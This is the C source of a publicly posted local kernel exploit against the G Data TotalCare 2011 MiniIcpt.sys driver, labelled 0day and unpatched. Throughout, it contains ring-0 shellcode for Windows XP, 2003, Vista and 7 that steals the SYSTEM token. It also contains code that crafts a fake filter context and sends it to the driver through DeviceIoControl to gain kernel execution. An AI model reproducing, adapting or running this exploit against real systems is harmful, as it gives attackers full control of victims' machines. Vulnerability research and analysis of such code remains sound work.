/*
# Exploit Title: G Data TotalCare 2011 0day Local Kernel Exploit
# Date: 2010-11-08
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.gdata.de/
# Version: up to date, version 21.1.0.5, MiniIcpt.sys version 1.0.8.9
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <stdio.h>
#include "winsock2.h"
#include <windows.h>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "Ws2_32.lib")
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"\x8b\x89\xd8\x00\x00\x00"
"\x89\x88\xd8\x00\x00\x00"
"\x90";
static unsigned char winvista_ring0_shell[] =
/* _ring0 */
"\x64\xa1\x24\x01\x00\x00"
//"\x8b\x00"
"\x8b\x70\x48"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x9c\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\xa4\x00\x00\x00"
"\x2d\xa0\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\x9c\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\xa4\x00\x00\x00"
"\x2d\xa0\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"\x8b\x89\xe0\x00\x00\x00"
"\x89\x88\xe0\x00\x00\x00"
"\x90";
static unsigned char win7_ring0_shell[] =
/* _ring0 */
"\x64\xa1\x24\x01\x00\x00"
"\x8b\x70\x50"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\xb4\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\xbc\x00\x00\x00"
"\x2d\xb8\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\xb4\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\xbc\x00\x00\x00"
"\x2d\xb8\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"\x8b\x89\xf8\x00\x00\x00"
"\x89\x88\xf8\x00\x00\x00"
"\x90";
static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\x70\x44"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"\x8b\x89\xc8\x00\x00\x00"
"\x89\x88\xc8\x00\x00\x00"
"\x90";
static unsigned char freeze[] =
"\xeb\xfe";// jmp $0
void craft_fake_flt_context(char* buff, LPVOID shellcode_addr)
{
DWORD references = 1;
DWORD *Entry;
Entry = (DWORD*)malloc(0x8);
Entry[0] = Entry;//Entry[0] == esi
Entry[1] = shellcode_addr;//[esi+4] - r0 shellcode
memcpy(buff-0x4, &references, 0x4);
memcpy(buff-0x28, Entry, 0x4);
}
static PCHAR fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;
dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
printf("dwMajorVersion = %d dwMinorVersion %d\n", dwMajorVersion, dwMinorVersion);
switch (dwMajorVersion)
{
case 5:
switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);
case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);
default:
printf("GetVersion, unsupported version\n");
exit(EXIT_FAILURE);
}
case 6:
switch (dwMinorVersion)
{
case 0:
*zlen = sizeof winvista_ring0_shell - 1;
*(PDWORD) &winvista_ring0_shell[54] = ppid;
return (winvista_ring0_shell);
case 1:
*zlen = sizeof win7_ring0_shell - 1;
*(PDWORD) &win7_ring0_shell[54] = ppid;
return (win7_ring0_shell);
default:
printf("GetVersion, unsupported version\n");
exit(EXIT_FAILURE);
}
default:
printf("GetVersion, unsupported version\n");
exit(EXIT_FAILURE);
}
return (NULL);
}
int main(int argc, char **argv)
{
HANDLE hDevice, hThread;
char *inbuff, *inbuffer;
DWORD *buff;
DWORD ioctl = 0x83170180, in = 0xC, out = 0x0C, len, zlen, ppid;
LPVOID zpage, zbuf;
printf ("G Data TotalCare 2011 0day Local Kernel Exploit\n"
"by: Nikita Tarakanov (CISS Research Team)\n");
if (argc <= 1)
{
printf("Usage: %s <processid to elevate>\n", argv[0]);
return 0;
}
ppid = atoi(argv[1]);
zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
printf("VirtualAlloc failed\n");
return 0;
}
printf("Ring 0 shellcode at 0x%08X address\n", zpage, 0x10000);
memset(zpage, 0xCC, 0x1000);
zbuf = fixup_ring0_shell(ppid, &zlen);
memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);
if ( (hDevice = CreateFileA("\\\\.\\MiniIcptControlDevice0",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (char *)malloc(0x1000);
memset(inbuff, 0x90, 0x1000);
buff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
inbuffer = inbuff + 0x40;
printf("crafting\n");
craft_fake_flt_context(inbuffer, zpage);
printf("deviceio!\n");
buff[0] = inbuffer;
DeviceIoControl(hDevice, ioctl, buff, in, buff, out, &len, NULL);
free(inbuff);
return 0;
}
